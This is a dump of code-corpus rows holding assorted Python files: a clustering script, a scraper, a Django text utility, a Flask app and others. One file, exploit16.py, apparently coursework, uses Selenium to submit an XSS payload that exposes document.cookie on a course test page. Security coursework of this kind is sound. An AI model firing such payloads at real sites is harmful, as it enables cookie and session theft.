blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f430769b8f4c5f89e5a5f0ed787986792f63ccf0 | 55909fa57cb120260f328ba62b611569f457edeb | /dsc/uge16/garbage/assignment_clustering/task.py | e940d2d694166f2ea298beb4e13cecebb143adc8 | [] | no_license | Mutestock/cphsoft | 72886b885b6fbaad8191096982630dc9796898b8 | f0c48f11e35a493f3971e703dc5967bb1e015694 | refs/heads/master | 2023-05-07T06:05:47.177390 | 2021-06-02T14:20:03 | 2021-06-02T14:20:03 | 335,205,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,959 | py | import joblib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from scipy.spatial.distance import cdist
print("#======= Data Preparation =======#")
# Load the clustering demo data; no header row, so columns are 0 and 1.
df = pd.read_csv("data/cluster_data.csv", header=None)
X = df.values
# Output directory for all saved plots and the number of clusters used below.
RESOURCES_DIRECTORY = "resources"
CLUSTER_COUNT = 4
def make_scatterplot(X=X):
    """Save a scatter plot of the raw input points to resources/scatterplot_1.jpeg.

    Note: the default for X is bound to the module-level array at definition
    time, so calling without arguments always plots the loaded CSV data.
    """
    # Plot the input data
    # a. creates figure
    plt.figure()
    plt.title('Input data')
    # b. get the range of X and Y (long way)
    # first column
    x_min = X[:, 0].min()
    x_max = X[:, 0].max()
    # second column
    y_min = X[:, 1].min()
    y_max = X[:, 1].max()
    # same as above: get the range of X and Y (short way)
    # x_min, x_max = X[:, 0].min(), X[:, 0].max()
    # y_min, y_max = X[:, 1].min(), X[:, 1].max()
    # c. set plot limits with a one-unit margin around the data
    plt.xlim(x_min - 1, x_max + 1)
    plt.ylim(y_min - 1, y_max + 1)
    # plot the points
    plt.scatter(X[:,0], X[:,1], marker='o', facecolors='none', edgecolors='black', s=30)
    plt.savefig(f'{RESOURCES_DIRECTORY}/scatterplot_1.jpeg', bbox_inches='tight')
    plt.close()
def make_scatterplot_with_boundaries(X=X):
    """Fit KMeans on X and save a plot of the cluster decision regions.

    A dense mesh over the data range is classified point by point; the
    resulting label image gives smooth boundaries, on top of which the data
    points and the cluster centroids are drawn.  Output file:
    resources/scatterplot_with_boundaries.jpeg.
    """
    kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
    # init: method of experimental finding of the initial location of the centroids
    # n_init: the algorithm will run n_init times with different centroids and the best result of those will be taken
    # Train the KMeans clustering model
    kmeans.fit(X)
    # we need a grid of points for drawing a smooth border between clusters
    # define step size of the mesh
    step_size = 0.01
    # we need to cover all points of our data
    # create a grid out of an array of X values and an array of y values
    x_min = X[:, 0].min()
    x_max = X[:, 0].max()
    # second column
    y_min = X[:, 1].min()
    y_max = X[:, 1].max()
    x_coord = np.arange(x_min, x_max, step_size)
    y_coord = np.arange(y_min, y_max, step_size)
    # meshgrid() creates a matrix of coordinates from the two vectors of coordinates
    x_vals, y_vals = np.meshgrid(x_coord, y_coord)
    # Predict cluster labels for all the points on the grid
    # ravel() returns 1D-array
    xx = x_vals.ravel()
    yy = y_vals.ravel()
    # np.c_ concatenates the arguments
    labels = kmeans.predict(np.c_[xx,yy])
    labels = labels.reshape(x_vals.shape)
    print("Labels:\n", labels)
    # Plot the clusters
    # create new plot area
    plt.figure()
    # clear the plot area
    plt.clf()
    plt.title('Boundaries of clusters')
    # plot the frame
    plt.xlim(x_min, x_max)
    plt.ylim(y_min, y_max)
    # plot the clusters
    plt.imshow(labels, interpolation='nearest',
               extent=(x_vals.min(), x_vals.max(), y_vals.min(), y_vals.max()),
               cmap='viridis', aspect='auto')
    # plot the points as they belong to the clusters
    plt.scatter(X[:,0], X[:,1], marker='o', facecolors='none', edgecolors='white', s=30)
    # plot the centroids
    centers = kmeans.cluster_centers_
    plt.scatter(centers[:,0], centers[:,1], s=200, linewidths=2, color='yellow', marker='*', zorder=3, facecolors='black')
    # annotate the centroids with their cluster index, slightly above the star
    for i, center in enumerate(centers):
        plt.annotate(i, center+[0.0,1.0],
                     size=15, zorder=1, color='yellow', weight='bold',
                     horizontalalignment='center', verticalalignment='center',)
    plt.savefig('resources/scatterplot_with_boundaries.jpeg', bbox_inches='tight')
    plt.close()
## Determine K by Elbow and Silouette Methods
# Determine k by minimizing the distortion -
# the sum of the squared distances between each observation vector and its centroid
def make_wcss(one, two, X):
    """Compute the mean distortion of KMeans for each k in range(one, two).

    The distortion for a given k is the average Euclidean distance from
    each sample to its nearest cluster centre; plotting the returned list
    against k gives the elbow chart.

    :param one: first (inclusive) number of clusters to try
    :param two: last (exclusive) number of clusters to try
    :param X: 2-D array of samples, shape (n_samples, n_features)
    :return: list of distortions, one per k in range(one, two)
    """
    distortions = []
    for k in range(one, two):
        # Fit exactly once.  The previous version chained .fit(X) in the
        # constructor call and then called model.fit(X) again, training
        # every model twice for no benefit.
        model = KMeans(n_clusters=k).fit(X)
        distortions.append(sum(np.min(cdist(X, model.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])
    return distortions
def scatter_elbow(X=X):
    """Compute WCSS/distortion for k = 1..9 and save the elbow chart.

    Output file: resources/scatterplot_elbow.jpeg.  The default for X is
    bound to the module-level data at definition time.
    """
    print("> Generated Scatterplot")
    #make_scatterplot(X)
    print("\n======= Step 3: Implement KMeans Algorithm for Training a Prediction Model ======")
    wcss = make_wcss(1, 10, X)
    print("> Generated WCSS:\n", wcss)
    plt.plot(range(1, 10), wcss)
    plt.title('Elbow Method')
    plt.xlabel('Number of clusters')
    plt.ylabel('WCSS')
    plt.savefig('resources/scatterplot_elbow.jpeg', bbox_inches='tight')
    plt.close()
def cluster_stuff():
    """Fit KMeans on the module-level X, print diagnostics and save one
    scatter plot per cluster.

    :return: list of the saved plot file names (relative to ``resources/``)
    """
    # Optimal number of clusters K (local; shadows the module-level constant)
    CLUSTER_COUNT = 4 # In our case it's 4
    # Create an instance of KMeans classifier
    kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
    # init: method of experimental finding of the initial location of the centroids
    # n_init: the algorithm will run n_init times with different centroids and the best result of those will be taken
    # Train the KMeans clustering model
    kmeans.fit(X)
    print("> Kmeans", kmeans)
    print("\n====== Implement the Trained Model for Prediction =======")
    y_pred = kmeans.predict(X)
    print("> y predicted:\n", y_pred)
    # See the predicted labels of clusters
    # cluster labels are stored in variable 'kmeans.labels_'
    print("> kmeans labels:\n", kmeans.labels_)
    arr = []
    print("\n======= Review the Results =======")
    # Split the clusters, for demo purpose only
    for i in range(CLUSTER_COUNT):
        # slice the cluster
        cluster = X[y_pred == i]
        # print the shape
        print("Cluster ", i, ": ", cluster.shape)
        # plot the points of this cluster
        plt.scatter(cluster[:, 0], cluster[:, 1])
        plt.grid(True)
        plt.title("Cluster " + str(i) + ": " + str(cluster.shape))
        file_name = f'scatterplot_cluster_{str(i)}.jpeg'
        plt.savefig("resources/" + file_name, bbox_inches='tight')
        arr.append(file_name)
        # close the figure so the next iteration starts a fresh plot
        plt.close()
    return arr
# Plot the points with color code of the predicted clusters
# viridis - a color map, https://matplotlib.org/users/colormaps.html
# s - marker size, here, the dots size
# c - marker color, here taken from the predicted clusters
def scatterplot_all_clustered(X=X):
    """Fit a fresh 4-cluster KMeans and save one plot of all points with the
    cluster centres overlaid in red.

    Output file: resources/scatterplot_with_all_clusters.jpeg.
    """
    # Create an instance of KMeans classifier
    # Optimal number of clusters K (local; shadows the module-level constant)
    CLUSTER_COUNT = 4 # In our case it's 4
    kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
    kmeans.fit(X)
    print("> All Clusters in One Plot")
    plt.scatter(X[:,0], X[:,1])
    centers = kmeans.cluster_centers_
    plt.scatter(centers[:, 0], centers[:, 1], s=300, c='red')
    plt.title('All Clusters in One Plot w/ centers')
    print(kmeans.cluster_centers_)
    plt.savefig('resources/scatterplot_with_all_clusters.jpeg', bbox_inches='tight')
    plt.close()
#print("\n======= Print Bondaries of Clusters ========")
#make_scatterplot_with_boundaries(X)
#print("\n======== Store the model in a file ========")
#joblib.dump(kmeans, 'model/kmmodel.pkl') | [
"doublenegative@protonmail.com"
] | doublenegative@protonmail.com |
3804bf933ae550237c35e79bfbe044ab37add67d | f9ddaef2b0f5fdb684b1ab0c251e6a3eabbf740d | /hello_world.py | d34d0fdbd8a3c771b190667d54eb26c424a42b6c | [] | no_license | ruthmartin16/hello_world | 808806e47ce1143d3b692b4f3a9115b6e761e9de | 73692d5b9a120f8f7e408800cf7213e329c197f9 | refs/heads/master | 2021-01-13T12:06:44.046861 | 2017-01-03T01:13:48 | 2017-01-03T01:13:48 | 77,869,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | print "Hello world?"
"111"ere is some function I'm working on"
fdsafdsa | [
"leibs@colorado.edu"
] | leibs@colorado.edu |
0bf5a8c6326903b1d13c14f70c5cecc7758378aa | 0ed2c666d4e79a9fd3acce710af120556d01a1f2 | /assignment2/scripts/exploit16/exploit16.py | 50d320aef19e2f8c05725d44e5f7f5655c9f1983 | [
"MIT"
] | permissive | vhazali/cs5331 | 63a0f76729b02d4d700489ff2d8a3b02f1a995e8 | 3b3618aaa17199ebcd3c01bc6c25ddbdbe4f3d0f | refs/heads/master | 2021-01-20T01:06:13.830017 | 2017-04-24T10:13:32 | 2017-04-24T10:13:32 | 89,224,813 | 8 | 6 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# Launch Firefox through geckodriver with the marionette protocol enabled.
caps = DesiredCapabilities.FIREFOX
caps["marionette"] = True
caps["binary"] = "/usr/bin/firefox"
driver = webdriver.Firefox(capabilities=caps,executable_path='./exploit16/geckodriver')
# Coursework XSS demo: open the target page and submit a payload through the
# message field that pops an alert containing the document cookie.
driver.get("http://www.wsb.com/Assignment2/case16/controller.php")
elem = driver.find_element_by_id("msg")
elem.send_keys('";alert(document.cookie);"')
btn = driver.find_element_by_id("send")
btn.click()
driver.close()
| [
"victorhazali@gmail.com"
] | victorhazali@gmail.com |
ebf0492a6d3f90568a7c6772fbdcd5413c236a4c | 5957bf2a9abb6b73171015ae320fd727470a4b30 | /fabbrica/company/helpers.py | 5adee6cf186e6ab24a25405fca1dc3656cfe9540 | [] | no_license | bhavishyasharma/fabbrica-api | 13bb22d7020dd79d34b566ae0c4d8eee4d0fb005 | ceb0f0959468c2bcc65bd719a00828fd1843c6ac | refs/heads/master | 2022-04-14T05:53:16.306612 | 2020-04-14T22:14:59 | 2020-04-14T22:14:59 | 254,918,457 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from mongoengine.errors import DoesNotExist
from .model import CompanyModel
from fabbrica.acl.model import AclModel
from fabbrica.machine.model import MachineModel
def updateAcl(company:CompanyModel):
    """Ensure an ACL document exists for every (machine, user) pair of *company*.

    For each machine owned by the company and each of the company's users, an
    existing AclModel is looked up; if none exists, a new one is created with
    publish rights on the machine-id topic.  Every document (found or newly
    created) is saved.
    """
    machines = MachineModel.objects(company=company).all()
    for machine in machines:
        for user in company.users:
            try:
                acl = AclModel.objects(clientid=str(machine.id),username=user.username, publish=str(machine.id)).get()
            except DoesNotExist:
                # No ACL yet for this machine/user: create one with the
                # default subscribe/pubsub topics.
                acl = AclModel(username=user.username, clientid=str(machine.id), publish=[str(machine.id)], subscribe=[""], pubsub=["#"])
            acl.save()
| [
"bhavishyasharma@live.com"
] | bhavishyasharma@live.com |
8c14f4d248c435521ebd826dc33f5a9e2a201049 | a3655505e846d819a34f26e311199de6d76cfc40 | /online_inference/tests/conftest.py | 0bb571660e5777e4b5c7ef0c9994b183f979d8bb | [] | no_license | StepDan23/MADE_ml_in_prod | 1defb98f183b0dd6c4e7158b8f213be7d5354c3a | 694dd733b61cae244587d8c617ae6c21d6181821 | refs/heads/master | 2023-06-02T00:29:53.938778 | 2021-06-24T09:27:04 | 2021-06-24T09:27:04 | 381,957,243 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | import pytest
@pytest.fixture()
def faker_seed():
    """Fix the Faker RNG seed so generated test data is reproducible."""
    return 42
@pytest.fixture
def fake_dataset(faker):
    """Generate 100 single-row JSON object strings of synthetic patient data.

    Each record is produced by Faker with per-field value ranges; the
    surrounding '[' and ']' of Faker's JSON array output are stripped so
    every entry is a bare JSON object string.
    NOTE(review): field names look like the UCI heart-disease schema used by
    the service under test — confirm against the model's expected input.
    """
    data = [faker.json(
        data_columns=[
            ('idx', 'pyint', {'min_value': 50, 'max_value': 100}),
            ('age', 'pyint', {'min_value': 0, 'max_value': 120}),
            ('sex', 'pyint', {'min_value': 0, 'max_value': 1}),
            ('cp', 'pyint', {'min_value': 0, 'max_value': 3}),
            ('trestbps', 'pyint', {'min_value': 20, 'max_value': 250}),
            ('chol', 'pyint', {'min_value': 0, 'max_value': 1000}),
            ('fbs', 'pyint', {'min_value': 0, 'max_value': 1}),
            ('restecg', 'pyint', {'min_value': 0, 'max_value': 2}),
            ('thalach', 'pyint', {'min_value': 20, 'max_value': 250}),
            ('exang', 'pyint', {'min_value': 0, 'max_value': 1}),
            ('oldpeak', 'pyfloat', {'min_value': 0.0, 'max_value': 10.0}),
            ('slope', 'pyint', {'min_value': 0, 'max_value': 2}),
            ('ca', 'pyint', {'min_value': 0, 'max_value': 4}),
            ('thal', 'pyint', {'min_value': 0, 'max_value': 3}),
        ], num_rows=1
    ).replace("[", "").replace("]", "") for _ in range(100)]
    return data
| [
"stepdan23@yandex-team.ru"
] | stepdan23@yandex-team.ru |
f4311e631988959593b4909a623382340cb980ca | 89fb56bcd983a07b52ed741977a44eb9f15dabe8 | /Crawler/CrawledArticle_Demo.py | 65943f67a936d9539d792307417df6e92f638d17 | [] | no_license | GokhanIrmak/PythonBasics-Demos | fa4574c21c9eb5055ebdcab0ed91570b5dd27fd2 | dd14bbddc0d58815de347fe2c127c9c0f2c2732e | refs/heads/main | 2023-05-05T03:52:44.833881 | 2021-05-29T13:22:07 | 2021-05-29T13:22:07 | 349,741,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
class CrawledArticle():
    """A single article scraped from the demo page.

    Plain value object holding the pieces extracted per card: title, emoji,
    teaser content and the absolute image URL.
    """
    def __init__(self, title, emoji, content, image):
        self.title = title
        self.emoji = emoji
        self.content = content
        self.image = image

    def __repr__(self):
        # concise debug form; the (long) content is omitted on purpose
        return "CrawledArticle(title={!r}, emoji={!r}, image={!r})".format(
            self.title, self.emoji, self.image)
class ArticleFetcher():
    """Downloads the demo article page and turns each card into a CrawledArticle."""
    def fetch(self):
        """Fetch the index page and parse every ``.card`` element.

        :return: list of CrawledArticle objects with title, emoji, teaser
            text and an absolute image URL.
        """
        url = "http://python.beispiel.programmierenlernen.io/index.php"
        r = requests.get(url)
        doc = BeautifulSoup(r.text, "html.parser")
        articles = []
        for card in doc.select(".card"):
            emoji = card.select_one(".emoji").text
            content = card.select_one(".card-text").text
            # the second span inside .card-title carries the visible title text
            title = card.select(".card-title span")[1].text
            imageUrl = card.select_one("img").attrs["src"]
            # resolve the (possibly relative) image path against the page URL
            image = urljoin(url,imageUrl)
            crawled = CrawledArticle(title, emoji, content, image)
            articles.append(crawled)
        return articles
# print(r.status_code)
# print(r.headers)
# print(r.text)
# for p in doc.find_all("p"):
# print(p.text)
# print(p.attrs) #Print attributes of 'p'
# Selecting with CSS Selectors
# cards = doc.select(".card")
# print(cards)
# emojis = doc.select(".emoji")
# print(emojis)
# Demo: fetch all articles and print the first one's image URL.
# NOTE: performs a live HTTP request when the module is executed.
fetcher = ArticleFetcher()
fetched = fetcher.fetch()[0]
print(fetched.image)
| [
"gokhanirmak2@hotmail.com"
] | gokhanirmak2@hotmail.com |
5762b55809127ad9cde6e4a808cc5ab6a4b2b3ae | d336a8e159517b5f27277be7c2d47effb5cf98de | /my-text-utils/views.py | d54d1c05d1dbc69bdec613963c5cf7bac5052491 | [] | no_license | bhavy285/My-text-utils | 418179c3efc2854b1badfd260df96a845f0ce3b8 | 59fcc089e68b9a8ed34f669370596c0c4d7f0f7c | refs/heads/main | 2023-06-04T02:13:29.544098 | 2021-06-19T04:18:28 | 2021-06-19T04:18:28 | 378,320,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,652 | py | from typing import Counter
from django import http
from django.http import HttpResponse
from django.shortcuts import render
# def het(request):
# return HttpResponse('''<h1>this is Het</h1><br> <a href="https://www.instagram.com/direct/inbox/" >insta bhavy shah</a>''')
# def hitul(request):
# return HttpResponse("this is hitul shah")
def index(request):
    """Render the text-utils home page (static template, no context)."""
    return render(request, 'index.html')
def analyzer(request):
    """Apply the text operations selected in the POSTed form.

    Reads the text and the on/off state of each checkbox from
    ``request.POST``.  Selected operations are applied in a fixed order,
    each one feeding its output into the next; the result of the last
    applied operation is rendered via ``analyzer.html``.
    """
    # the text to analyze
    djtext = request.POST.get('text', 'default')
    # checkbox states ('on' when ticked, 'off' otherwise); the names must
    # match the input names in index.html
    removepunc = request.POST.get('removepunc', 'off')
    capslock = request.POST.get('capslock', 'off')
    linere = request.POST.get('linere', 'off')
    spacecl = request.POST.get('spacecl', 'off')
    exspcl = request.POST.get('exspcl', 'off')
    chacou = request.POST.get('chacou', 'off')
    # Sensible default so the page still renders when no checkbox is
    # selected (the original code raised UnboundLocalError in that case).
    params = {'purpose': 'no operation selected', 'analyzed_text': djtext}
    if removepunc == "on":
        # note: the leading space in this string means spaces are removed too
        punctions = ''' !()-[]{}/*-`<>/?;:='",.@#$%^&*()-_++'''
        analyzed = ''.join(char for char in djtext if char not in punctions)
        params = {'purpose': 'removed punctions', 'analyzed_text': analyzed}
        djtext = analyzed
    if capslock == 'on':
        analyzed = djtext.upper()
        params = {'purpose': 'capatize it', 'analyzed_text': analyzed}
        djtext = analyzed
    if linere == 'on':
        # strip newline and carriage-return characters
        analyzed = ''.join(char for char in djtext if char not in '\n\r')
        params = {'purpose': 'newline remover ', 'analyzed_text': analyzed}
        djtext = analyzed
    if spacecl == 'on':
        # remove every space character
        analyzed = djtext.replace(' ', '')
        params = {'purpose': 'space remover ', 'analyzed_text': analyzed}
        djtext = analyzed
    if exspcl == 'on':
        # Collapse runs of spaces: keep a space only when it is not followed
        # by another space.  The bounds check fixes the original IndexError
        # on text ending with a space (djtext[index + 1] past the end).
        analyzed = ''
        for index, char in enumerate(djtext):
            if not (char == ' ' and index + 1 < len(djtext) and djtext[index + 1] == ' '):
                analyzed = analyzed + char
        params = {'purpose': 'extra space remover ', 'analyzed_text': analyzed}
        djtext = analyzed
    if chacou == 'on':
        # character count of the (possibly already transformed) text
        analyzed = len(djtext)
        params = {'purpose': 'character counter ', 'analyzed_text': analyzed}
        djtext = analyzed
    return render(request, 'analyzer.html', params)
# else:
# return HttpResponse("Error")
# return HttpResponse("this is remove page")
# def newline(request):
# return HttpResponse("this is new line")
# def analyzer(request):
# return HttpResponse("this is analyzer")
| [
"noreply@github.com"
] | bhavy285.noreply@github.com |
ea90e3d2000a6d79995394c0b952a7b27684d6ed | 622540c6cea183081b8e9285d6d13e085ba772ba | /rango/bing_search.py | 35ac5b2f1dd9868d7fdec605c3111801c16a8fe1 | [] | no_license | GeorgiosGoulos/Rango | 6112882b6026b2d7428e4af069fd963e00e9036a | 5bf890c7a2991f3d07c28d0fa95de3aa41dd5d38 | refs/heads/master | 2021-01-22T06:37:48.687869 | 2015-03-26T18:25:32 | 2015-03-26T18:25:32 | 29,824,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,976 | py | import json
import urllib
import urllib2
import sys # for encoding purposes, see main()
from rango_keys import BING_API_KEY
def run_query(search_terms):
    """Query the Bing Search API for *search_terms* (Python 2 / urllib2 code).

    :return: list of dicts with 'title', 'link' and 'summary' keys, or an
        empty list if the connection fails.
    """
    # Specify the base
    root_url = 'https://api.datamarket.azure.com/Bing/Search/'
    source = 'Web'
    # Specify how many results we wish to be returned per page.
    # Offset specifies where in the results list to start from.
    # With results_per_page = 10 and offset = 11, this would start from page 2.
    results_per_page = 4
    offset = 0
    # Wrap quotes around our query terms as required by the Bing API.
    # The query we will then use is stored within variable query.
    query = "'{0}'".format(search_terms)
    query = urllib.quote(query)
    # Construct the latter part of our request's URL.
    # Sets the format of the response to JSON and sets other properties.
    search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
        root_url,
        source,
        results_per_page,
        offset,
        query)
    # Setup authentication with the Bing servers.
    # The username MUST be a blank string; the API key acts as the password.
    username = ''
    # Create a 'password manager' which handles authentication for us.
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    password_mgr.add_password(None, search_url, username, BING_API_KEY)
    # Create our results list which we'll populate.
    results = []
    try:
        # Prepare for connecting to Bing's servers.
        handler = urllib2.HTTPBasicAuthHandler(password_mgr)
        opener = urllib2.build_opener(handler)
        urllib2.install_opener(opener)
        # Connect to the server and read the response generated.
        response = urllib2.urlopen(search_url).read()
        # Convert the string response to a Python dictionary object.
        json_response = json.loads(response)
        # Loop through each page returned, populating our results list.
        for result in json_response['d']['results']:
            results.append({
                'title': result['Title'],
                'link': result['Url'],
                'summary': result['Description']})
    # Catch a URLError exception - something went wrong when connecting!
    except urllib2.URLError, e:
        print "Error when querying the Bing API: ", e
    # Return the list of results to the calling function.
    return results
def main():
    """Interactive demo (Python 2): prompt for a query and print the results.

    Each result's title, link and summary are printed, followed by any
    additional keys the result dict happens to carry.
    """
    query = raw_input("Enter your query: ")
    results = run_query(query)
    for result in results:
        if 'title' in result:
            print "Title:", result['title']
        if 'link' in result:
            print 'Link:', result['link']
        if 'summary' in result:
            # re-encode so characters unprintable on this console are replaced
            print 'Summary:', result['summary'].encode(sys.stdout.encoding, errors='replace')
        for key in result:
            if key not in ('title', 'link', 'summary'):
                print str(key) + ":", result[key]
        print
    print "Done"
"georgiosagou@gmail.com"
] | georgiosagou@gmail.com |
087dc56facc468713381222dde079cabb5399127 | 64d4b5c45fa50d3cc5b4bc77ced577d96d97be7b | /List/list-1.py | 3ad785a959dec38d8462df2943a7dfab58026dfe | [] | no_license | anshu-pathak/python-basic | 30b610dcba0fdcf490557eae65bdf2343d37aae7 | 368a330e1744e266892e196c30b2e37dac5ddd09 | refs/heads/main | 2023-02-18T20:27:58.958833 | 2021-01-17T16:57:44 | 2021-01-17T16:57:44 | 314,469,075 | 1 | 0 | null | 2020-12-04T14:06:40 | 2020-11-20T06:43:07 | Python | UTF-8 | Python | false | false | 73 | py | # declare a list.
# Demo: print a small list of fruit names.
myList = ["apple", "banana", "mango"]
print(myList)
| [
"anshu.pathak@logicielsolutions.co.in"
] | anshu.pathak@logicielsolutions.co.in |
8cca55d1ad2f671b929fe8344281b5cd67f71880 | d26ccea37676da626c4117ec539146fcf66b817b | /BackEND/Week11-Day02/app.py | bcb7d22f0c243e432d6a423ef4f3e1d9272e6101 | [] | no_license | Emrah611/PragmatechFoundationProject | eef9613858401d01d6656f63750a70eeecdfb5a0 | 4cfed0cf957d262a65cad2c1080f078456bff9cf | refs/heads/main | 2023-05-20T01:41:22.155481 | 2021-06-16T14:02:00 | 2021-06-16T14:02:00 | 348,273,850 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,500 | py |
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from os.path import join, dirname, realpath, os
from sqlalchemy.orm import backref
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = join(dirname(realpath(__file__)), 'static/uploads/')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
db = SQLAlchemy(app)
class Customer(db.Model):
    """A shop customer; owns zero or more Order rows (see ``orders``)."""
    id = db.Column(db.Integer,primary_key=True)
    name = db.Column(db.String(50),nullable=False)
    # NOTE(review): db.String without a length works on SQLite; verify for
    # other backends before switching databases.
    email = db.Column(db.String,unique=True)
    # default image file name, presumably served from static assets
    image = db.Column(db.String(20),default = 'customer.jpg')
    age = db.Column(db.Integer,nullable=False)
    # one-to-many: each Order gets an 'owner' backref to its Customer
    orders = db.relationship('Order',backref='owner',lazy = True)
    def __repr__(self):
        return f'Customer {self.name}'
class Order(db.Model):
    """An order placed by a Customer (reachable as ``order.owner``)."""
    id = db.Column(db.Integer,primary_key=True)
    title = db.Column(db.String(50),nullable=False)
    short_description = db.Column(db.String(50),nullable=False)
    description = db.Column(db.Text,nullable = False)
    # default image file name, presumably served from static assets
    image = db.Column(db.String(20),default = 'image.png')
    # FK to the owning customer; the 'owner' backref is defined on Customer.orders
    customer_id = db.Column(db.Integer,db.ForeignKey('customer.id'),nullable=False)
    def __repr__(self):
        return f'Order {self.title}'
@app.route('/')
def index():
    """Render the home page with every customer in the database."""
    customers = Customer.query.all()
    return render_template('index.html', customers=customers)
if __name__=='__main__':
app.run(debug=True) | [
"bey_emrah@mail.ru"
] | bey_emrah@mail.ru |
2950ec6a8d2837d53498fe9bf3c20caeaab8832f | ea9ea4a276970ecc0f5156a192d93195b4d3428a | /my_object_capture.py | 11701d0b286fe7a11f37a279dd73db1367f40e56 | [] | no_license | pmcbride/coral-webcam-detection | 34a393a1039a02206878a848e2388e23a0885db6 | 014106414d19f430528f8fc9ab0e9e88398d5fc9 | refs/heads/master | 2020-06-28T19:55:30.314700 | 2019-08-09T06:04:56 | 2019-08-09T06:04:56 | 200,326,091 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | import argparse
import io
import time
import RPi.GPIO as IO
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from imutils.video import VideoStream
from PIL import Image
import numpy as np
import imutils
import cv2
# Parse CLI arguments: model/label file paths and the detection threshold.
parser = argparse.ArgumentParser()
parser.add_argument(
    '--model', help='File path of Tflite model.', required=True)
parser.add_argument('--label', help='File path of label file.', required=True)
parser.add_argument('--confidence', help='Minimum probability to filter weak detections.', type=float, default=0.3)
args = parser.parse_args()
labels = dataset_utils.ReadLabelFile(args.label)
model = DetectionEngine(args.model)
# Two GPIO output pins (board numbering): 40 signals "person detected",
# 38 signals "no person".
IO.cleanup()
IO.setmode(IO.BOARD)
IO.setup(40, IO.OUT)
IO.setup(38, IO.OUT)
# NOTE(review): imutils' VideoStream is not documented as a context manager;
# the commented-out line below suggests the original pattern was a plain
# assignment — confirm that `with ... as vs` actually works here.
with VideoStream(src=0).start() as vs:
  #vs = VideoStream(src=0).start()
  time.sleep(2)
  # Loop over the frames from the video stream
  while True:
    found_person = False
    # grab the frame from the threaded video stream and resize it
    # to have a maximum width of 500 pixels
    frame = vs.read()
    frame = imutils.resize(frame, width=500)
    orig = frame.copy()
    # prepare the frame for classification by converting (1) it from
    # BGR to RGB channel ordering and then (2) from a NumPy array to
    # PIL image format
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    frame = Image.fromarray(frame)
    # make predictions on the input frame
    start = time.time()
    results = model.DetectWithImage(frame, threshold=args.confidence, keep_aspect_ratio=True, relative_coord=False)
    end = time.time()
    # ensure at least one result was found
    for r in results:
      # extract the bounding box and box and predicted class label
      box = r.bounding_box.flatten().astype("int")
      (startX, startY, endX, endY) = box
      label = labels[r.label_id]
      if label=="person":
        found_person = True
      # draw the bounding box and label on the image
      cv2.rectangle(orig, (startX, startY), (endX, endY), (0, 255, 0), 2)
      y = startY - 15 if startY - 15 > 15 else startY + 15
      text = "{}: {:.2f}%".format(label, r.score * 100)
      cv2.putText(orig, text, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
    # show the output frame and wait for a key press
    cv2.imshow("Frame", orig)
    key = cv2.waitKey(1) & 0xFF
    # drive the GPIO pins according to whether a person was seen this frame
    if found_person==True:
      IO.output(40, 1)
      IO.output(38, 0)
    else:
      IO.output(40, 0)
      IO.output(38, 1)
    # if the `q` key was pressed, break from the loop
    if key == ord("q"):
      break
  # do a bit of cleanup
  cv2.destroyAllWindows()
  vs.stop()
  IO.cleanup()
| [
"pmmcbride@gmail.com"
] | pmmcbride@gmail.com |
744050f54c6b4fd67c0c7cceee5792ae2aba7de2 | 18b26ccde6a5fb823185e2fe17e708c8718bcfd6 | /Python Crash Course/statistics_practice.py | 2e474684a58d13694cd8fa9a889d831386144f43 | [] | no_license | huskydj1/CSC_630_Machine_Learning | 9245bab12df131afc1463f880df877b6a7013dcc | a13e51983847ad4e7069982f07da60bde5eb9951 | refs/heads/main | 2023-08-24T20:45:14.712870 | 2021-11-04T02:21:23 | 2021-11-04T02:21:23 | 424,351,946 | 0 | 0 | null | 2021-11-03T19:18:45 | 2021-11-03T19:18:45 | null | UTF-8 | Python | false | false | 1,184 | py | from functools import reduce
